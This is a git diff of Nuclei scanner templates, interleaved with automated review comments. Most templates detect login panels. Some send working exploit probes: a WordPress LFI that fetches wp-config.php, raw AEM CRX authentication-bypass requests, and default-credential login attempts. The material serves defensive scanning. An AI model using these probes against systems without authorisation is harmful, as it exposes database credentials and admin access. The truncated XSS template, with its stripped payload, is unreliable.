metadata: - fofa-query: app="AdminSet" - vendor: https://github.com/guhongze/adminset/ - tags: adminset,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "AdminSet Login" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adminset-panel-80.yaml b/nuclei-templates/Other/adminset-panel-80.yaml new file mode 100644 index 0000000000..c539d29be5 --- /dev/null +++ b/nuclei-templates/Other/adminset-panel-80.yaml 
@@ -0,0 +1,34 @@ +id: adminset-panel + +info: + name: Adminset Login Panel + author: ffffffff0x + severity: info + description: An Adminset login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: app="AdminSet" + reference: + - https://github.com/guhongze/adminset/ + tags: adminset,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AdminSet Login" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-coldfusion-error-detect-88.yaml b/nuclei-templates/Other/adobe-coldfusion-error-detect-86.yaml similarity index 100% rename from nuclei-templates/Other/adobe-coldfusion-error-detect-88.yaml rename to nuclei-templates/Other/adobe-coldfusion-error-detect-86.yaml diff --git a/nuclei-templates/Other/adobe-component-login-89.yaml b/nuclei-templates/Other/adobe-component-login-89.yaml new file mode 100644 index 0000000000..1d46e94118 --- /dev/null +++ b/nuclei-templates/Other/adobe-component-login-89.yaml @@ -0,0 +1,31 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + severity: info + description: An Adobe ColdFusion Component Browser login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6846 + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: panel,adobe,coldfusion + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 
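Review bot: adobe-component-login-89.yaml requests both `/CFIDE/componentutils/login.cfm` and `/cfide/componentutils/login.cfm` without `stop-at-first-match: true`, so on a server that resolves paths case-insensitively a single instance produces two identical findings. Adding `stop-at-first-match: true` next to `matchers-condition: and` matches the pattern used by adminer-panel-75.yaml in this same commit. A short comment on the second path, `# lower-case variant for case-sensitive deployments`, would explain why both are listed.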
diff --git a/nuclei-templates/Other/adobe-component-login.yaml b/nuclei-templates/Other/adobe-component-login.yaml deleted file mode 100644 index 9b423f9a58..0000000000 --- a/nuclei-templates/Other/adobe-component-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - description: An Adobe ColdFusion Component Browser login panel was detected. - severity: info - reference: - - https://www.exploit-db.com/ghdb/6846 - tags: panel,adobe,coldfusion - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-connect-central-login-93.yaml b/nuclei-templates/Other/adobe-connect-central-login-93.yaml deleted file mode 100644 index fd70acd2de..0000000000 --- a/nuclei-templates/Other/adobe-connect-central-login-93.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-connect-central-login - -info: - name: Adobe Connect Central Login - author: dhiyaneshDk - severity: info - tags: adobe,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/system/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Connect Central Login' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adobe-connect-central-login-97.yaml b/nuclei-templates/Other/adobe-connect-central-login-97.yaml new file mode 100644 index 0000000000..9f025cb957 --- /dev/null +++ b/nuclei-templates/Other/adobe-connect-central-login-97.yaml 
@@ -0,0 +1,30 @@
+id: adobe-connect-central-login
+
+info:
+ name: Adobe Connect Central Login Panel
+ author: dhiyaneshDk
+ severity: info
+ description: An Adobe Connect Central login panel was detected.
+ reference:
+ - https://www.adobe.com/products/adobeconnect.html
+ classification:
+ cwe-id: CWE-200
+ tags: adobe,panel,connect-central
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/system/login"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Adobe Connect Central Login'
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/20
diff --git a/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml b/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml
deleted file mode 100644
index 2e4d3089a9..0000000000
--- a/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: adobe-connect-username-exposure
-
-info:
- name: Adobe Connect Username Exposure
- author: dhiyaneshDk
- severity: low
- reference:
- - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
- tags: adobe,disclosure
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/system/help/support"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Administrators name:'
- - 'Support Administrators email address:'
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/adobe-connect-username-exposure.yaml b/nuclei-templates/Other/adobe-connect-username-exposure.yaml
new file mode 100644
index 0000000000..088b39ad5e
--- /dev/null
+++ b/nuclei-templates/Other/adobe-connect-username-exposure.yaml
@@ -0,0 +1,26 @@ +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/adobe-connect-version-104.yaml b/nuclei-templates/Other/adobe-connect-version.yaml similarity index 100% rename from nuclei-templates/Other/adobe-connect-version-104.yaml rename to nuclei-templates/Other/adobe-connect-version.yaml diff --git a/nuclei-templates/Other/adobe-experience-manager-login-109.yaml b/nuclei-templates/Other/adobe-experience-manager-login-109.yaml deleted file mode 100644 index c1a0f41886..0000000000 --- a/nuclei-templates/Other/adobe-experience-manager-login-109.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe Experience Manager Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe Experience Manager login panel was detected. - reference: - - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - classification: - cwe-id: CWE-200 - tags: panel,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-experience-manager-login.yaml b/nuclei-templates/Other/adobe-experience-manager-login.yaml new file mode 100644 index 0000000000..4dbdef1e18 --- /dev/null 
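Review bot: The new adobe-connect-username-exposure.yaml is a step backwards from the adobe-connect-username-exposure-101.yaml deleted in the previous hunk: `reference:` becomes a scalar instead of a list, it is placed before `author`, and the file carries no `classification:`/`cwe-id`, whereas the rest of this commit normalises templates toward list references and CWE ids. Restoring the list form, `reference:` followed by `- https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html`, and adding `classification:` with `cwe-id: CWE-200` keeps the file consistent with its siblings. The request and matchers are otherwise identical to the deleted copy.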
+++ b/nuclei-templates/Other/adobe-experience-manager-login.yaml @@ -0,0 +1,33 @@ +id: adobe-experience-manager-login + +info: + name: Adobe Experience Manager Login Panel + author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-media-server-110.yaml b/nuclei-templates/Other/adobe-media-server-110.yaml new file mode 100644 index 0000000000..2ee6efc2c8 --- /dev/null +++ b/nuclei-templates/Other/adobe-media-server-110.yaml @@ -0,0 +1,30 @@ +id: adobe-media-server + +info: + name: Adobe Media Server Login Panel + author: dhiyaneshDK + severity: info + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-media-server.yaml b/nuclei-templates/Other/adobe-media-server.yaml deleted file mode 100644 index deaf55913a..0000000000 --- a/nuclei-templates/Other/adobe-media-server.yaml +++ /dev/null 
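Review bot: adobe-experience-manager-login.yaml reintroduces a `classification` block with `cvss-metrics`, `cvss-score: 0.0` and an empty `cve-id:` key that the deleted adobe-experience-manager-login-109.yaml had already trimmed to `cwe-id: CWE-200`; an empty `cve-id:` parses as null and a 0.0 CVSS score carries no information for an info-level panel detection. The same regression appears in advance-setup-122.yaml further down (its deleted counterpart advance-setup-119.yaml had the trimmed block). In both, dropping the three extra keys and keeping `classification:` with `cwe-id: CWE-200` matches the format the rest of this commit converges on.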
@@ -1,23 +0,0 @@ -id: adobe-media-server - -info: - name: Adobe Media Server - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - tags: panel,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Media Server' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/advance-setup-119.yaml b/nuclei-templates/Other/advance-setup-119.yaml deleted file mode 100644 index bbee2bbcf7..0000000000 --- a/nuclei-templates/Other/advance-setup-119.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: advanced-setup-login - -info: - name: ActionTec Modem Advanced Setup Login Panel - author: dhiyaneshDK - severity: info - description: An ActionTec Modem Advanced Setup login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6819 - - https://www.actiontec.com/dsl/ - classification: - cwe-id: CWE-200 - tags: panel,setup - -requests: - - method: GET - path: - - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Advanced Setup - Security - Admin User Name & Password' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/advance-setup-122.yaml b/nuclei-templates/Other/advance-setup-122.yaml new file mode 100644 index 0000000000..629d3b1e84 --- /dev/null +++ b/nuclei-templates/Other/advance-setup-122.yaml 
@@ -0,0 +1,32 @@ +id: advanced-setup-login + +info: + name: ActionTec Modem Advanced Setup Login Panel + author: dhiyaneshDK + description: An ActionTec Modem Advanced Setup login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6819 + - https://www.actiontec.com/dsl/ + tags: panel,setup + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Advanced Setup - Security - Admin User Name & Password' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml b/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml new file mode 100644 index 0000000000..9838f210f1 --- /dev/null +++ b/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml @@ -0,0 +1,29 @@ +id: advanced-access-manager-lfi + +info: + name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion + author: 0x_Akoko + severity: high + description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers. + reference: + - https://wpscan.com/vulnerability/9873 + - https://id.wordpress.org/plugins/advanced-access-manager/ + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/?aam-media=wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/advanced-access-manager-lfi.yaml b/nuclei-templates/Other/advanced-access-manager-lfi.yaml deleted file mode 100644 index 653f312d6c..0000000000 
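Review bot: advanced-access-manager-lfi-116.yaml drops the `classification` block (CVSS 3.0 vector, `cvss-score: 7.5`, `cwe-id: CWE-22`) that the deleted advanced-access-manager-lfi.yaml in the next hunk carried, so a high-severity finding now ships without a CWE or score. Restoring that block is a pure metadata change and keeps the template in line with the rest of this commit, which adds classification data rather than removing it. The matchers confirm disclosure by looking for `DB_NAME` and `DB_PASSWORD` in the body; a `description` sentence noting that a positive result means live database credentials were returned to the scanner would help operators handle the output appropriately.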
--- a/nuclei-templates/Other/advanced-access-manager-lfi.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: advanced-access-manager-lfi -info: - name: WordPress Advanced Access Manager <5.9.9 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers. - reference: - - https://wpscan.com/vulnerability/9873 - - https://id.wordpress.org/plugins/advanced-access-manager/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/?aam-media=wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aem-childrenlist-xss.yaml b/nuclei-templates/Other/aem-childrenlist-xss.yaml new file mode 100644 index 0000000000..d5107fd8bf --- /dev/null +++ b/nuclei-templates/Other/aem-childrenlist-xss.yaml @@ -0,0 +1,50 @@ +id: aem-xss-childlist + +info: + name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting + author: theabhinavgaur,ott3rly + severity: medium + description: | + Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the c> + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" + - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '

please authenticate

' + condition: or + + - type: word + part: body + words: + - 'data-coral-columnview-id' + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-crx-bypass-134.yaml b/nuclei-templates/Other/aem-crx-bypass-134.yaml new file mode 100644 index 0000000000..cdb6438ebc --- /dev/null +++ b/nuclei-templates/Other/aem-crx-bypass-134.yaml @@ -0,0 +1,46 @@ +id: aem-crx-bypass + +info: + name: AEM Package Manager - Authentication Bypass + author: dhiyaneshDK + description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed. + severity: critical + remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages." + reference: + - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ + tags: aem,adobe + +requests: + - raw: + - | + GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + - | + GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'buildCount' + - 'downloadName' + - 'acHandling' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 
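Review bot: The `description: |` block in aem-childrenlist-xss.yaml ends mid-sentence at `via requests using the c>`, so either the block scalar was cut when the file was written or the rendering lost the rest; as shown it is not a complete description. The first word matcher also contains an empty `''` entry under `condition: or`, which, if it is really empty in the file, matches every body and makes that matcher always pass; the other strings in that list look like stripped markup, so the file should be checked against the source for lost tags. A complete description such as `Adobe Experience Manager reflects attacker-controlled path selectors through the childrenlist endpoint, allowing cross-site scripting.` is the minimum to restore.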
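Review bot: aem-crx-bypass-134.yaml sends two raw requests that are matched independently and has no `stop-at-first-match: true`, so a single affected host reports the finding twice (once per request) even though the second request is only a path-variant of the first. Adding `stop-at-first-match: true` alongside `matchers-condition: and`, as other templates in this commit do, yields one result per host. The `_dc=1615863080856` cache-buster is a fixed timestamp; a comment `# _dc is a cache-buster, value is arbitrary` would save the next reader from wondering whether it is significant.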
diff --git a/nuclei-templates/Other/aem-crx-bypass.yaml b/nuclei-templates/Other/aem-crx-bypass.yaml deleted file mode 100644 index a6187d442a..0000000000 --- a/nuclei-templates/Other/aem-crx-bypass.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: aem-crx-bypass - -info: - author: dhiyaneshDK - name: AEM CRX Bypass - severity: critical - reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ - tags: aem - -requests: - - raw: - - | - GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - - - | - GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'buildCount' - - 'downloadName' - - 'acHandling' - condition: and - - - type: word - part: header - words: - - 'application/json' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aem-default-get-servlet-135.yaml b/nuclei-templates/Other/aem-default-get-servlet-135.yaml deleted file mode 100644 index cd831dbd52..0000000000 --- a/nuclei-templates/Other/aem-default-get-servlet-135.yaml +++ /dev/null 
@@ -1,80 +0,0 @@ -id: aem-default-get-servlet -info: - author: DhiyaneshDk - name: AEM DefaultGetServlet - severity: low - reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/.json' - - '{{BaseURL}}/.1.json' - - '{{BaseURL}}/....4.2.1....json' - - '{{BaseURL}}/.json?FNZ.css' - - '{{BaseURL}}/.json?FNZ.ico' - - '{{BaseURL}}/.json?FNZ.html' - - '{{BaseURL}}/.json/FNZ.css' - - '{{BaseURL}}/.json/FNZ.html' - - '{{BaseURL}}/.json/FNZ.png' - - '{{BaseURL}}/.json/FNZ.ico' - - '{{BaseURL}}/.children.1.json' - - '{{BaseURL}}/.children....4.2.1....json' - - '{{BaseURL}}/.children.json?FNZ.css' - - '{{BaseURL}}/.children.json?FNZ.ico' - - '{{BaseURL}}/.children.json?FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.css' - - '{{BaseURL}}/.children.json/FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.png' - - '{{BaseURL}}/.children.json/FNZ.ico' - - '{{BaseURL}}/etc.json' - - '{{BaseURL}}/etc.1.json' - - '{{BaseURL}}/etc....4.2.1....json' - - '{{BaseURL}}/etc.json?FNZ.css' - - '{{BaseURL}}/etc.json?FNZ.ico' - - '{{BaseURL}}/etc.json?FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.css' - - '{{BaseURL}}/etc.json/FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.ico' - - '{{BaseURL}}/etc.children.json' - - '{{BaseURL}}/etc.children.1.json' - - '{{BaseURL}}/etc.children....4.2.1....json' - - '{{BaseURL}}/etc.children.json?FNZ.css' - - '{{BaseURL}}/etc.children.json?FNZ.ico' - - '{{BaseURL}}/etc.children.json?FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.css' - - '{{BaseURL}}/etc.children.json/FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.png' - - '{{BaseURL}}/etc.children.json/FNZ.ico' - - '{{BaseURL}}///etc.json' - - '{{BaseURL}}///etc.1.json' - - '{{BaseURL}}///etc....4.2.1....json' - - '{{BaseURL}}///etc.json?FNZ.css' - - '{{BaseURL}}///etc.json?FNZ.ico' - - '{{BaseURL}}///etc.json/FNZ.html' - - '{{BaseURL}}///etc.json/FNZ.png' - - '{{BaseURL}}///etc.json/FNZ.ico' - - 
'{{BaseURL}}///etc.children.json' - - '{{BaseURL}}///etc.children.1.json' - - '{{BaseURL}}///etc.children....4.2.1....json' - - '{{BaseURL}}///etc.children.json?FNZ.css' - - '{{BaseURL}}///etc.children.json?FNZ.ico' - - '{{BaseURL}}///etc.children.json?FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.css' - - '{{BaseURL}}///etc.children.json/FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.png' - - '{{BaseURL}}///etc.children.json/FNZ.ico' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'jcr:createdBy' - condition: and diff --git a/nuclei-templates/Other/aem-default-get-servlet-138.yaml b/nuclei-templates/Other/aem-default-get-servlet-138.yaml new file mode 100644 index 0000000000..d3546ab204 --- /dev/null +++ b/nuclei-templates/Other/aem-default-get-servlet-138.yaml 
@@ -0,0 +1,78 @@ +id: aem-default-get-servlet +info: + author: DhiyaneshDk + name: AEM DefaultGetServlet + severity: low + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/.json' + - '{{BaseURL}}/.1.json' + - '{{BaseURL}}/....4.2.1....json' + - '{{BaseURL}}/.json?FNZ.css' + - '{{BaseURL}}/.json?FNZ.ico' + - '{{BaseURL}}/.json?FNZ.html' + - '{{BaseURL}}/.json/FNZ.css' + - '{{BaseURL}}/.json/FNZ.html' + - '{{BaseURL}}/.json/FNZ.png' + - '{{BaseURL}}/.json/FNZ.ico' + - '{{BaseURL}}/.children.1.json' + - '{{BaseURL}}/.children....4.2.1....json' + - '{{BaseURL}}/.children.json?FNZ.css' + - '{{BaseURL}}/.children.json?FNZ.ico' + - '{{BaseURL}}/.children.json?FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.css' + - '{{BaseURL}}/.children.json/FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.png' + - '{{BaseURL}}/.children.json/FNZ.ico' + - '{{BaseURL}}/etc.json' + - '{{BaseURL}}/etc.1.json' + - '{{BaseURL}}/etc....4.2.1....json' + - '{{BaseURL}}/etc.json?FNZ.css' + - '{{BaseURL}}/etc.json?FNZ.ico' + - '{{BaseURL}}/etc.json?FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.css' + - '{{BaseURL}}/etc.json/FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.ico' + - '{{BaseURL}}/etc.children.json' + - '{{BaseURL}}/etc.children.1.json' + - '{{BaseURL}}/etc.children....4.2.1....json' + - '{{BaseURL}}/etc.children.json?FNZ.css' + - '{{BaseURL}}/etc.children.json?FNZ.ico' + - '{{BaseURL}}/etc.children.json?FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.css' + - '{{BaseURL}}/etc.children.json/FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.png' + - '{{BaseURL}}/etc.children.json/FNZ.ico' + - '{{BaseURL}}///etc.json' + - '{{BaseURL}}///etc.1.json' + - '{{BaseURL}}///etc....4.2.1....json' + - '{{BaseURL}}///etc.json?FNZ.css' + - '{{BaseURL}}///etc.json?FNZ.ico' + - '{{BaseURL}}///etc.json/FNZ.html' + - '{{BaseURL}}///etc.json/FNZ.png' + - '{{BaseURL}}///etc.json/FNZ.ico' + - 
'{{BaseURL}}///etc.children.json' + - '{{BaseURL}}///etc.children.1.json' + - '{{BaseURL}}///etc.children....4.2.1....json' + - '{{BaseURL}}///etc.children.json?FNZ.css' + - '{{BaseURL}}///etc.children.json?FNZ.ico' + - '{{BaseURL}}///etc.children.json?FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.css' + - '{{BaseURL}}///etc.children.json/FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.png' + - '{{BaseURL}}///etc.children.json/FNZ.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'jcr:createdBy' + condition: and diff --git a/nuclei-templates/Other/aem-default-login-142.yaml b/nuclei-templates/Other/aem-default-login-142.yaml index 66a6189c19..5d614791b3 100644 --- a/nuclei-templates/Other/aem-default-login-142.yaml +++ b/nuclei-templates/Other/aem-default-login-142.yaml @@ -1,5 +1,4 @@ id: aem-default-login - info: name: Adobe AEM Default Login author: random-robbie @@ -14,7 +13,6 @@ info: metadata: shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe - requests: - raw: - | @@ -25,7 +23,6 @@ requests: Referer: {{BaseURL}}/libs/granite/core/content/login.html _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - attack: pitchfork payloads: aem_user: @@ -37,7 +34,6 @@ requests: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info - aem_pass: - admin - password @@ -47,14 +43,12 @@ requests: - anonymous - jdoe - aparker - stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: diff --git a/nuclei-templates/Other/aem-gql-servlet-147.yaml b/nuclei-templates/Other/aem-gql-servlet-147.yaml new file mode 100644 index 0000000000..36a597b300 --- /dev/null +++ b/nuclei-templates/Other/aem-gql-servlet-147.yaml 
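Review bot: The new aem-default-get-servlet-138.yaml drops the `stop-at-first-match: true` line that the deleted version carried just before `matchers-condition: and`, so with 58 path variants nuclei keeps sending every remaining request to a host after the first hit. Add ` stop-at-first-match: true` immediately before ` matchers-condition: and` in the requests block. The path list and matchers are otherwise byte-identical to the removed file, so this looks like an accidental loss rather than an intended change.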
@@ -0,0 +1,26 @@
+id: aem-gql-servlet
+
+info:
+ author: DhiyaneshDk
+ name: AEM GQLServlet
+ severity: low
+ reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
+ tags: aem
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'excerpt'
+ - 'path'
+ - 'hits'
+ condition: and
diff --git a/nuclei-templates/Other/aem-gql-servlet-149.yaml b/nuclei-templates/Other/aem-gql-servlet-149.yaml
deleted file mode 100644
index 977dc70f75..0000000000
--- a/nuclei-templates/Other/aem-gql-servlet-149.yaml
+++ /dev/null
